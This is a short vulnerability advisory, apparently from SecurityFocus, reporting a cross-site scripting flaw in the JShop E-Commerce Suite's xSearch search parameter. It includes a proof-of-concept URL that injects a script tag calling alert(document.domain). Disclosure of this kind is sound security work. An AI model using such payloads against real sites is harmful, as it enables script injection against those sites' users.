JShop E-Commerce Suite xSearch Cross-Site Scripting Vulnerability

The following proof of concept has been supplied:

search.php?xSearch=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscrip%3E&submit=Search


 

Privacy Statement
Copyright 2010, SecurityFocus